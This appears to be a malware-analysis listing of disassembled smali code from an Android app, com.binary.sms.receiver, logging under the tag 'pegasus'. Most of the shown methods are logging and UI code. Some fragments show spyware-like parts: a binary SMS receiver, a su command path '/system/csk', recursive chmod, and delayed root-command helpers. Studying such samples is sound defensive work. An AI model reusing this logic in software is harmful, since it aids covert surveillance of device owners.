    5"Ljava/util/List",
    6"<",
    7"Ljava/lang/String;",
    8">;)V"
    9}
    10.end annotation
    11.prologue
    12try_start_0:
    13invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    14move-result-object v2
    16invoke-interface {p1, v2}, Ljava/util/List;->add(Ljava/lang/Object;)Z
    18invoke-virtual {p0}, Ljava/io/File;->isDirectory()Z
    19try_end_a: move-result v2
    20if-eqz v2, :cond_15
    21try_start_d:
    22invoke-virtual {p0}, Ljava/io/File;->listFiles()[Ljava/io/File;
    23move-result-object v3
    24array-length v4, v3
    25const/4 v2, 0x0
    26goto_13: if-lt v2, v4, :cond_16
    27cond_15: return-void
    28cond_16: aget-object v0, v3, v2
    29try_end_18:
    30invoke-static {v0, p1}, Lcom/binary/sms/receiver/SkeletonActivity;->getFileList(Ljava/io/File;Ljava/util/List;)V
    31goto_1b: add-int/lit8 v2, v2, 0x1
    32goto/16 :goto_13
    33catch_1e: move-exception v1
    34new-instance v2, Ljava/lang/StringBuilder;
    36const-string v3, "getFileList: "
    38invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    40invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    41move-result-object v3
    43invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    44move-result-object v2
    46invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    47move-result-object v2
    49invoke-static {v2, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    50goto/16 :goto_15
    51catch_36: move-exception v5
    52goto/16 :goto_1b
    53catch_38: move-exception v2
    54goto/16 :goto_15
    APIs
    • android.util.Log.e
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.widget.EditText.append
    Strings
    • pegasus
    • error:
    • \n
    Position Instruction Meta Information
    0.param p0, "message" # Ljava/lang/String;
    1.prologue
    2sget-boolean v0, Lcom/binary/sms/receiver/Logger;->isDebug:Z
    3if-eqz v0, :cond_9
    5const-string v0, "pegasus"
    7invoke-static {v0, p0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    8cond_9:
    9sget-object v0, Lcom/binary/sms/receiver/Logger;->editor:Landroid/widget/EditText;
    10new-instance v1, Ljava/lang/StringBuilder;
    12const-string v2, "error: "
    14invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    16invoke-virtual {v1, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    17move-result-object v1
    19const-string v2, "\n"
    21invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    22move-result-object v1
    24invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    25move-result-object v1
    27invoke-virtual {v0, v1}, Landroid/widget/EditText;->append(Ljava/lang/CharSequence;)V
    28return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • mClearListener:
    Position Instruction Meta Information
    0.param p1, "v" # Landroid/view/View;
    1.prologue
    2try_start_0:
    3iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity$2;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    5invoke-static {v1}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    6move-result-object v1
    8const-string v2, ""
    10invoke-virtual {v1, v2}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    11goto_b: return-void
    12catch_c: move-exception v0
    13new-instance v1, Ljava/lang/StringBuilder;
    15const-string v2, "mClearListener: "
    17invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    19invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    20move-result-object v2
    22invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    23move-result-object v1
    25invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    26move-result-object v1
    28invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    29goto/16 :goto_b
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.systemCallCopy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • net
    • copyDataData:
    Position Instruction Meta Information
    0.param p0, "source" # Ljava/lang/String;
    1.prologue
    2try_start_0:
    3const-string v1, "net"
    4const/4 v2, 0x0
    5const-wide/16 v3, 0x0
    7invoke-static {v1, v2, v3, v4, p0}, Lcom/binary/sms/receiver/SkeletonActivity;->systemCallCopy(Ljava/lang/String;[Ljava/lang/String;JLjava/lang/String;)V
    8goto_8: return-void
    9catch_9: move-exception v0
    10new-instance v1, Ljava/lang/StringBuilder;
    12const-string v2, "copyDataData: "
    14invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    16invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    17move-result-object v2
    19invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    20move-result-object v1
    22invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    23move-result-object v1
    25invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    26goto/16 :goto_8
    APIs
    • android.widget.EditText.append
    • android.text.Html.fromHtml
    • android.widget.EditText.append
    • android.widget.EditText.append
    Strings
    • \n
    • <font color=\'#FF0000\'>___________________________________</font>
    Position Instruction Meta Information
    0.prologue
    2invoke-static {}, Lcom/binary/sms/receiver/Logger;->access$0()Landroid/widget/EditText;
    3move-result-object v0
    5const-string v1, "\n"
    7invoke-virtual {v0, v1}, Landroid/widget/EditText;->append(Ljava/lang/CharSequence;)V
    9invoke-static {}, Lcom/binary/sms/receiver/Logger;->access$0()Landroid/widget/EditText;
    10move-result-object v0
    12const-string v1, "<font color=\'#FF0000\'>___________________________________</font>"
    14invoke-static {v1}, Landroid/text/Html;->fromHtml(Ljava/lang/String;)Landroid/text/Spanned;
    15move-result-object v1
    17invoke-virtual {v0, v1}, Landroid/widget/EditText;->append(Ljava/lang/CharSequence;)V
    19invoke-static {}, Lcom/binary/sms/receiver/Logger;->access$0()Landroid/widget/EditText;
    20move-result-object v0
    22const-string v1, "\n"
    24invoke-virtual {v0, v1}, Landroid/widget/EditText;->append(Ljava/lang/CharSequence;)V
    25return-void
    APIs
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.widget.EditText.append
    Strings
    • \n
    Position Instruction Meta Information
    0.prologue
    2invoke-static {}, Lcom/binary/sms/receiver/Logger;->access$0()Landroid/widget/EditText;
    3move-result-object v0
    4new-instance v1, Ljava/lang/StringBuilder;
    6iget-object v2, p0, Lcom/binary/sms/receiver/Logger$1;->val$message:Ljava/lang/String;
    8invoke-static {v2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    9move-result-object v2
    11invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    13const-string v2, "\n"
    15invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    16move-result-object v1
    18invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    19move-result-object v1
    21invoke-virtual {v0, v1}, Landroid/widget/EditText;->append(Ljava/lang/CharSequence;)V
    22return-void
    APIs
    • android.os.HandlerThread.<init>
    • android.os.HandlerThread.start
    • android.os.HandlerThread.getLooper
    • android.os.Handler.<init>
    • java.util.Timer.<init>
    Strings
    • MainHandlerThread
    Position Instruction Meta Information
    0.prologue
    1const/4 v1, 0x0
    2sput-object v1, Lcom/binary/sms/receiver/SmsReceiver;->agentAddress:Ljava/lang/String;
    3sput-object v1, Lcom/binary/sms/receiver/SmsReceiver;->tokenId:Ljava/lang/String;
    4new-instance v0, Landroid/os/HandlerThread;
    6const-string v1, "MainHandlerThread"
    8invoke-direct {v0, v1}, Landroid/os/HandlerThread;-><init>(Ljava/lang/String;)V
    10invoke-virtual {v0}, Landroid/os/HandlerThread;->start()V
    11new-instance v1, Landroid/os/Handler;
    13invoke-virtual {v0}, Landroid/os/HandlerThread;->getLooper()Landroid/os/Looper;
    14move-result-object v2
    16invoke-direct {v1, v2}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
    17sput-object v1, Lcom/binary/sms/receiver/SmsReceiver;->resendingHandler:Landroid/os/Handler;
    18new-instance v1, Ljava/util/Timer;
    20invoke-direct {v1}, Ljava/util/Timer;-><init>()V
    21sput-object v1, Lcom/binary/sms/receiver/SmsReceiver;->timer:Ljava/util/Timer;
    22return-void
    Cross References
    APIs
    • android.util.Log.d
    • android.app.Activity.runOnUiThread
    Strings
    • <font color=\'#FF0000\'>___________________________________</font>
    • pegasus
    • _____________________________________
    Position Instruction Meta Information
    0.prologue
    1sget-boolean v1, Lcom/binary/sms/receiver/Logger;->isDebug:Z
    2if-eqz v1, :cond_1f
    4const-string v0, "<font color=\'#FF0000\'>___________________________________</font>"
    6const-string v1, "pegasus"
    8const-string v2, "_____________________________________"
    10invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    12sget-object v1, Lcom/binary/sms/receiver/Logger;->editor:Landroid/widget/EditText;
    13if-eqz v1, :cond_1f
    15sget-object v1, Lcom/binary/sms/receiver/Logger;->activity:Landroid/app/Activity;
    16if-eqz v1, :cond_1f
    18sget-object v1, Lcom/binary/sms/receiver/Logger;->activity:Landroid/app/Activity;
    19new-instance v2, Lcom/binary/sms/receiver/Logger$2;
    21invoke-direct {v2}, Lcom/binary/sms/receiver/Logger$2;-><init>()V
    23invoke-virtual {v1, v2}, Landroid/app/Activity;->runOnUiThread(Ljava/lang/Runnable;)V
    24cond_1f: return-void
    Cross References
    APIs
    • java.text.SimpleDateFormat.<init>
    • java.lang.System.currentTimeMillis
    • java.util.Date.<init>
    • java.text.SimpleDateFormat.format
    Strings
    • yyyy_MM_dd-hh_mm_ss
    Position Instruction Meta Information
    0.prologue
    1new-instance v0, Ljava/text/SimpleDateFormat;
    3const-string v1, "yyyy_MM_dd-hh_mm_ss"
    5invoke-direct {v0, v1}, Ljava/text/SimpleDateFormat;-><init>(Ljava/lang/String;)V
    6new-instance v1, Ljava/util/Date;
    8invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    9move-result-wide v2
    11invoke-direct {v1, v2, v3}, Ljava/util/Date;-><init>(J)V
    13invoke-virtual {v0, v1}, Ljava/text/SimpleDateFormat;->format(Ljava/util/Date;)Ljava/lang/String;
    14move-result-object v1
    15return-object v1
    Cross References
    APIs
    • java.io.File.getAbsolutePath
    • com.binary.sms.receiver.SkeletonActivity.chmod
    • java.io.File.isDirectory
    • java.io.File.listFiles
    • com.binary.sms.receiver.SkeletonActivity.chmodRec
    Position Instruction Meta Information
    0.param p1, "f" # Ljava/io/File;
    1.prologue
    3invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    4move-result-object v1
    6invoke-virtual {p0, v1}, Lcom/binary/sms/receiver/SkeletonActivity;->chmod(Ljava/lang/String;)V
    8invoke-virtual {p1}, Ljava/io/File;->isDirectory()Z
    9move-result v1
    10if-eqz v1, :cond_15
    11try_start_d:
    12invoke-virtual {p1}, Ljava/io/File;->listFiles()[Ljava/io/File;
    13move-result-object v2
    14array-length v3, v2
    15const/4 v1, 0x0
    16goto_13: if-lt v1, v3, :cond_16
    17cond_15: return-void
    18cond_16: aget-object v0, v2, v1
    19try_end_18:
    20invoke-direct {p0, v0}, Lcom/binary/sms/receiver/SkeletonActivity;->chmodRec(Ljava/io/File;)V
    21goto_1b: add-int/lit8 v1, v1, 0x1
    22goto/16 :goto_13
    23catch_1e: move-exception v4
    24goto/16 :goto_1b
    25catch_20: move-exception v1
    26goto/16 :goto_15
    APIs
    • android.app.Activity.onCreateOptionsMenu
    • android.view.Menu.add
    • android.view.MenuItem.setShortcut
    • android.view.Menu.add
    • android.view.MenuItem.setShortcut
    Position Instruction Meta Information
    0.param p1, "menu" # Landroid/view/Menu;
    1.prologue
    2const/4 v4, 0x1
    3const/4 v3, 0x0
    5invoke-super {p0, p1}, Landroid/app/Activity;->onCreateOptionsMenu(Landroid/view/Menu;)Z
    6const v0, 0x7f050001
    8invoke-interface {p1, v3, v4, v3, v0}, Landroid/view/Menu;->add(IIII)Landroid/view/MenuItem;
    9move-result-object v0
    10const/16 v1, 0x30
    11const/16 v2, 0x62
    13invoke-interface {v0, v1, v2}, Landroid/view/MenuItem;->setShortcut(CC)Landroid/view/MenuItem;
    14const/4 v0, 0x2
    15const v1, 0x7f050002
    17invoke-interface {p1, v3, v0, v3, v1}, Landroid/view/Menu;->add(IIII)Landroid/view/MenuItem;
    18move-result-object v0
    19const/16 v1, 0x31
    20const/16 v2, 0x63
    22invoke-interface {v0, v1, v2}, Landroid/view/MenuItem;->setShortcut(CC)Landroid/view/MenuItem;
    23return v4
    APIs
    • android.app.Activity.onPrepareOptionsMenu
    • android.view.Menu.findItem
    • com.binary.sms.receiver.SkeletonActivity.mEditor:Landroid/widget/EditText
    • android.widget.EditText.getText
    • android.text.Editable.length
    • android.view.MenuItem.setVisible
    Position Instruction Meta Information
    0.param p1, "menu" # Landroid/view/Menu;
    1.prologue
    2const/4 v1, 0x1
    4invoke-super {p0, p1}, Landroid/app/Activity;->onPrepareOptionsMenu(Landroid/view/Menu;)Z
    5const/4 v0, 0x2
    7invoke-interface {p1, v0}, Landroid/view/Menu;->findItem(I)Landroid/view/MenuItem;
    8move-result-object v2
    10iget-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    12invoke-virtual {v0}, Landroid/widget/EditText;->getText()Landroid/text/Editable;
    13move-result-object v0
    15invoke-interface {v0}, Landroid/text/Editable;->length()I
    16move-result v0
    17if-lez v0, :cond_1a
    18move v0, v1
    19goto_16:
    20invoke-interface {v2, v0}, Landroid/view/MenuItem;->setVisible(Z)Landroid/view/MenuItem;
    21return v1
    22cond_1a: const/4 v0, 0x0
    23goto/16 :goto_16
    APIs
    • android.view.MenuItem.getItemId
    • android.app.Activity.onOptionsItemSelected
    • com.binary.sms.receiver.SkeletonActivity.finish
    • com.binary.sms.receiver.SkeletonActivity.mEditor:Landroid/widget/EditText
    • android.widget.EditText.setText
    Position Instruction Meta Information
    0.param p1, "item" # Landroid/view/MenuItem;
    1.prologue
    2const/4 v0, 0x1
    4invoke-interface {p1}, Landroid/view/MenuItem;->getItemId()I
    5move-result v1
    6packed-switch v1, :pswitch_data_1a
    8invoke-super {p0, p1}, Landroid/app/Activity;->onOptionsItemSelected(Landroid/view/MenuItem;)Z
    9move-result v0
    10goto_c: return v0
    11pswitch_d:
    12invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->finish()V
    13goto/16 :goto_c
    14pswitch_11:
    15iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    17const-string v2, ""
    19invoke-virtual {v1, v2}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    20goto/16 :goto_c
    21nop
    Cross References
    APIs
    • android.util.Log.i
    • android.app.Activity.runOnUiThread
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p0, "message" # Ljava/lang/String;
    1.param p1, "printToScreen" # Z
    2.prologue
    3sget-boolean v0, Lcom/binary/sms/receiver/Logger;->isDebug:Z
    4if-eqz v0, :cond_1d
    6const-string v0, "pegasus"
    8invoke-static {v0, p0}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
    9if-eqz p1, :cond_1d
    11sget-object v0, Lcom/binary/sms/receiver/Logger;->editor:Landroid/widget/EditText;
    12if-eqz v0, :cond_1d
    14sget-object v0, Lcom/binary/sms/receiver/Logger;->activity:Landroid/app/Activity;
    15if-eqz v0, :cond_1d
    17sget-object v0, Lcom/binary/sms/receiver/Logger;->activity:Landroid/app/Activity;
    18new-instance v1, Lcom/binary/sms/receiver/Logger$1;
    20invoke-direct {v1, p0}, Lcom/binary/sms/receiver/Logger$1;-><init>(Ljava/lang/String;)V
    22invoke-virtual {v0, v1}, Landroid/app/Activity;->runOnUiThread(Ljava/lang/Runnable;)V
    23cond_1d: return-void
    APIs
    • java.lang.String.getBytes
    • java.lang.String.<init>
    Strings
    • UTF8
    Position Instruction Meta Information
    0.param p1, "body" # Ljava/lang/String;
    1.prologue
    2try_start_0: new-instance v0, Ljava/lang/String;
    4const-string v1, "UTF8"
    6invoke-virtual {p1, v1}, Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
    7move-result-object v1
    9invoke-direct {v0, v1}, Ljava/lang/String;-><init>([B)V
    10try_end_b: move-object p1, v0
    11goto_c: return-object p1
    12catch_d: move-exception v1
    13goto/16 :goto_c
    APIs
    • java.lang.Throwable.getMessage
    • android.util.Log.e
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p0, "e" # Ljava/lang/Throwable;
    1.prologue
    3const-string v0, "pegasus"
    5invoke-virtual {p0}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    6move-result-object v1
    8invoke-static {v0, v1, p0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    9return-void
    APIs
    • java.lang.Throwable.getMessage
    • android.util.Log.e
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p1, "e" # Ljava/lang/Throwable;
    1.prologue
    3const-string v0, "pegasus"
    5invoke-virtual {p1}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    6move-result-object v1
    8invoke-static {v0, v1, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    9return-void
    APIs
    • com.binary.sms.receiver.SmsReceiver.resendingHandler:Landroid/os/Handler
    • android.os.Handler.post
    Strings
    • Binary SMS onReceive
    Position Instruction Meta Information
    0.param p1, "context" # Landroid/content/Context;
    1.param p2, "intent" # Landroid/content/Intent;
    2.prologue
    4const-string v2, "Binary SMS onReceive"
    5const/4 v3, 0x0
    7invoke-static {v2, v3}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    8move-object v1, p2
    9move-object v0, p1
    11sget-object v2, Lcom/binary/sms/receiver/SmsReceiver;->resendingHandler:Landroid/os/Handler;
    12new-instance v3, Lcom/binary/sms/receiver/SmsReceiver$1;
    14invoke-direct {v3, p0, v1}, Lcom/binary/sms/receiver/SmsReceiver$1;-><init>(Lcom/binary/sms/receiver/SmsReceiver;Landroid/content/Intent;)V
    16invoke-virtual {v2, v3}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
    17return-void
    APIs
    • android.util.Log.d
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p1, "message" # Ljava/lang/String;
    1.prologue
    2sget-boolean v0, Lcom/binary/sms/receiver/Logger;->isDebug:Z
    3if-eqz v0, :cond_9
    5const-string v0, "pegasus"
    7invoke-static {v0, p1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    8cond_9: return-void
    APIs
    • android.util.Log.d
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p1, "message" # Ljava/lang/String;
    1.prologue
    2sget-boolean v0, Lcom/binary/sms/receiver/Logger;->isDebug:Z
    3if-eqz v0, :cond_9
    5const-string v0, "pegasus"
    7invoke-static {v0, p1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    8cond_9: return-void
    APIs
    • android.os.Handler.<init>
    Strings
    • /system/csk
    Position Instruction Meta Information
    0.prologue
    1new-instance v0, Landroid/os/Handler;
    3invoke-direct {v0}, Landroid/os/Handler;-><init>()V
    4sput-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->resendingHandler:Landroid/os/Handler;
    6const-string v0, "/system/csk"
    7sput-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->suCommand:Ljava/lang/String;
    8return-void
    Cross References
    APIs
    • android.util.Log.e
    Strings
    • pegasus
    Position Instruction Meta Information
    0.param p0, "message" # Ljava/lang/String;
    1.param p1, "e" # Ljava/lang/Throwable;
    2.prologue
    4const-string v0, "pegasus"
    6invoke-static {v0, p0, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    7return-void
    APIs
    • android.app.Activity.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Landroid/app/Activity;-><init>()V
    3const/4 v0, 0x0
    4iput v0, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    5new-instance v0, Lcom/binary/sms/receiver/SkeletonActivity$1;
    7invoke-direct {v0, p0}, Lcom/binary/sms/receiver/SkeletonActivity$1;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;)V
    8iput-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mBackListener:Landroid/view/View$OnClickListener;
    9new-instance v0, Lcom/binary/sms/receiver/SkeletonActivity$2;
    11invoke-direct {v0, p0}, Lcom/binary/sms/receiver/SkeletonActivity$2;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;)V
    12iput-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mClearListener:Landroid/view/View$OnClickListener;
    13return-void
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.resendingHandler:Landroid/os/Handler
    • android.os.Handler.postDelayed
    Position Instruction Meta Information
    0.param p0, "suComand" # Ljava/lang/String;
    1.param p1, "commands" # [Ljava/lang/String;
    2.param p2, "delay" # J
    3.param p4, "source" # Ljava/lang/String;
    4.prologue
    6sget-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->resendingHandler:Landroid/os/Handler;
    7new-instance v1, Lcom/binary/sms/receiver/SkeletonActivity$9;
    9invoke-direct {v1, p0, p1, p4}, Lcom/binary/sms/receiver/SkeletonActivity$9;-><init>(Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)V
    11invoke-virtual {v0, v1, p2, p3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
    12return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.resendingHandler:Landroid/os/Handler
    • android.os.Handler.postDelayed
    Position Instruction Meta Information
    0.param p1, "suComand" # Ljava/lang/String;
    1.param p2, "source" # Ljava/lang/String;
    2.param p3, "delay" # J
    3.prologue
    5sget-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->resendingHandler:Landroid/os/Handler;
    6new-instance v1, Lcom/binary/sms/receiver/SkeletonActivity$7;
    8invoke-direct {v1, p0, p1, p2}, Lcom/binary/sms/receiver/SkeletonActivity$7;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;Ljava/lang/String;Ljava/lang/String;)V
    10invoke-virtual {v0, v1, p3, p4}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
    11return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.resendingHandler:Landroid/os/Handler
    • android.os.Handler.postDelayed
    Position Instruction Meta Information
    0.param p1, "source" # Ljava/lang/String;
    1.param p2, "delay" # J
    2.prologue
    4sget-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->resendingHandler:Landroid/os/Handler;
    5new-instance v1, Lcom/binary/sms/receiver/SkeletonActivity$6;
    7invoke-direct {v1, p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity$6;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;Ljava/lang/String;)V
    9invoke-virtual {v0, v1, p2, p3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
    10return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.resendingHandler:Landroid/os/Handler
    • android.os.Handler.postDelayed
    Position Instruction Meta Information
    0.param p1, "suComand" # Ljava/lang/String;
    1.param p2, "delay" # J
    2.prologue
    4sget-object v0, Lcom/binary/sms/receiver/SkeletonActivity;->resendingHandler:Landroid/os/Handler;
    5new-instance v1, Lcom/binary/sms/receiver/SkeletonActivity$8;
    7invoke-direct {v1, p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity$8;-><init>(Lcom/binary/sms/receiver/SkeletonActivity;Ljava/lang/String;)V
    9invoke-virtual {v0, v1, p2, p3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
    10return-void
    APIs
    • android.app.Activity.onResume
    • com.binary.sms.receiver.SkeletonActivity.mEditor:Landroid/widget/EditText
    Position Instruction Meta Information
    0.prologue
    2invoke-super {p0}, Landroid/app/Activity;->onResume()V
    4iget-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity;->mEditor:Landroid/widget/EditText;
    6invoke-static {v0, p0}, Lcom/binary/sms/receiver/Logger;->setTextField(Landroid/widget/EditText;Landroid/app/Activity;)V
    7return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.finish
    Position Instruction Meta Information
    0.param p1, "v" # Landroid/view/View;
    1.prologue
    3iget-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity$1;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    5invoke-virtual {v0}, Lcom/binary/sms/receiver/SkeletonActivity;->finish()V
    6return-void
    APIs
    • com.binary.sms.receiver.SkeletonActivity.sendDataSmsByManager
    Position Instruction Meta Information
    0.param p1, "view" # Landroid/view/View;
    1.prologue
    3iget-object v0, p0, Lcom/binary/sms/receiver/SkeletonActivity$4;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    5invoke-virtual {v0}, Lcom/binary/sms/receiver/SkeletonActivity;->sendDataSmsByManager()V
    6return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    2iput-object p2, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$suComand:Ljava/lang/String;
    3iput-object p3, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$source:Ljava/lang/String;
    5invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    6return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$suComand:Ljava/lang/String;
    2iput-object p2, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$commands:[Ljava/lang/String;
    3iput-object p3, p0, Lcom/binary/sms/receiver/SkeletonActivity$9;->val$source:Ljava/lang/String;
    5invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    6return-void
    APIs
    • android.app.Activity.onPause
    Position Instruction Meta Information
    0.prologue
    1const/4 v0, 0x0
    3invoke-super {p0}, Landroid/app/Activity;->onPause()V
    5invoke-static {v0, v0}, Lcom/binary/sms/receiver/Logger;->setTextField(Landroid/widget/EditText;Landroid/app/Activity;)V
    6return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    2iput-object p2, p0, Lcom/binary/sms/receiver/SkeletonActivity$6;->val$source:Ljava/lang/String;
    4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    5return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    2iput-object p2, p0, Lcom/binary/sms/receiver/SkeletonActivity$8;->val$suComand:Ljava/lang/String;
    4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    5return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SmsReceiver$1;->this$0:Lcom/binary/sms/receiver/SmsReceiver;
    2iput-object p2, p0, Lcom/binary/sms/receiver/SmsReceiver$1;->val$constIntent:Landroid/content/Intent;
    4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    5return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/Logger$1;->val$message:Ljava/lang/String;
    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$1;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$2;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
